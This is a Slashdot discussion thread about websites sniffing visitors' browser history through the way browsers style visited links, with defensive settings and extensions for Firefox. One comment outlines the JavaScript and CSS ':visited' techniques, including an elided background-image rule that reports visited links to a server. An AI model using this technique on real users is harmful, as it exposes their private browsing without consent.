Your Browser History Is Showing 174
tiffanydanica writes "For a lot of us our browser history is something we consider private, or at least not something we want to expose to every website we visit. Web2.0collage is showing just how easy it is (with code!) for sites to determine what sites you visit. When you visit the site it sniffs your browser history, and creates a collage of the (safe for work) sites that you visit. It is an interesting application of potentially scary technology (imagine a job application site using this to screen candidates). You can jump right into having your history sniffed if you so desire. While the collages are cool on their own merit, they also serve as an illustration of the privacy implications of browser history sniffing."
Not mine (Score:5, Informative)
No Script baby
It's slashdotted (Score:4, Informative)
Re:Microsoft actually did something right (Score:5, Informative)
I'm using FF 3.0.11 on Jaunty with history disabled, and it did not get anything from my browser even though the "recently closed tabs" menu has many entries in it. All i got was a black square. I also had to tell NoScript to allow their domain. This made me feel better about my paranoid ways!
Comment removed (Score:5, Informative)
Re:This methodology is actually quite old (Score:4, Informative)
New about:config setting in FF 3.5:
layout.css.visited_links_enabled [mozilla.org]
If "visited" is a useful feature for you check out SafeHistory [mozilla.org]:
Restricts the marking of visited links on the basis of the originating document, defending against web privacy attacks that remote sites can use to determine your browser history at other sites
Known since at least 2006 (Score:5, Informative)
http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html [blogspot.com]
Of course there is no reason this is still not fixed (by being able to disable a:visited style).
Re:Did not work for me (Score:4, Informative)
Eh, noscript has become adware in the last year.
This is an out-dated claim: http://hackademix.net/2009/05/04/dear-adblock-plus-and-noscript-users-dear-mozilla-community/ [hackademix.net] It pertains to an ugly episode for which the NoScript author is rightfully apologetic.
It's a curious phenomenon, how the mind closes once a certain type of conclusion has been reached. This is the phenomenon that lead to the the NoScript/AbBlock war, and it seems entirely unfruitful to emulate exactly the kind of thinking that caused the issue in the first place.
Re:...So.... (Score:3, Informative)
This has been known for several years, and none of the browsers have done anything to fix it.
Re:Not mine (Score:5, Informative)
Re:...So.... (Score:5, Informative)
Re:...So.... (Score:4, Informative)
It's less invasive than being able to wholesale dump the browser history (you don't know when the sites were visited, for example), but protecting against it also means disabling functionality (you'd need to prevent an app from being able to tell whether or not a link on it's own page has been clicked via CSS rules or other means, which means either disabling the distinction between visited or not completely or disabling reading back style information and/or preventing setting CSS rules that trigger loading of external resources).
workaround in firefox (Score:5, Informative)
in firefox:
set layout.css.visited_links_enabled to FALSE in about config
This will break (a tiny part of) the layout of sites that use CSS to change the style of links that were visited by the user, but it protects against this problem.
Re:Not mine (Score:3, Informative)
I third it. I never browse at work.
Re:...So.... (Score:1, Informative)
Re:Known since at least 2006 (Score:2, Informative)
Bugzilla bug 57351 was reported in October of 2000:
https://bugzilla.mozilla.org/show_bug.cgi?id=57351 [mozilla.org]
(Bugzilla may or may not still hate Slashdot, copy and paste if clicking the link does not work).
Re:Microsoft actually did something right (Score:2, Informative)
Re:Not mine (Score:2, Informative)
Both use the same overall technique, which is that browsers display visited links differently to unvisited links. The JS implementation trawls a set of links looking for particular markers in the font colour or size, and the CSS implementation uses "a:visited {background-image:...}" to trick the browser into telling the server which links are visited and which are not.
The Link Status extension for FF3.5 can disable the :visited pseudo-class, preventing both methods from working.